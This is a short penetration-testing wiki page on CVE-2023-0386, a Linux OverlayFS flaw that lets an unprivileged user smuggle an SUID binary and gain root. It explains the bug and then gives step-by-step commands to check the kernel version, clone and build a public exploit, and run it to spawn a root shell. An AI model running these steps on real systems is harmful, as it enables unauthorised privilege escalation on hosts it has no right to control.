# CVE-2023-0386

## Theory

The overlay file system (often abbreviated as OverlayFS) allows a user to "merge" several mount points into a unified file system.

CVE-2023-0386 lies in the fact that when the kernel copied a file from the overlay file system to the "upper" directory, it did not check if the user/group owning this file was mapped in the current [user namespace](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-2/#user-namespace). This allows an unprivileged user to smuggle an SUID binary from a "lower" directory to the "upper" directory, by using OverlayFS as an intermediary.

## Practice

{% tabs %}
{% tab title="Enumerate" %}
The target system is likely to be vulnerable if it has a kernel version lower than 6.2.

```bash
#Get Kernel version
$ uname -r
5.15.70-051570-generic
```

{% endtab %}

{% tab title="Exploit" %}
Using [this exploit](https://github.com/sxlmnwb/CVE-2023-0386) from sxlmnwb, we can abuse CVE-2023-0386

```bash
#Compile
git clone https://github.com/sxlmnwb/CVE-2023-0386 && cd CVE-2023-0386
make all
```

Start two terminals on the target, in the first one type

```
./fuse ./ovlcap/lower ./gc
```

In the second terminal type. It will spawn a root shell.

```
./exp
```

{% hint style="info" %}
If the target doesn't have gcc installed, you may need to recreate a similar virtual environement to compile the exploit.
{% endhint %}
{% endtab %}
{% endtabs %}

## References

{% embed url="<https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/>" %}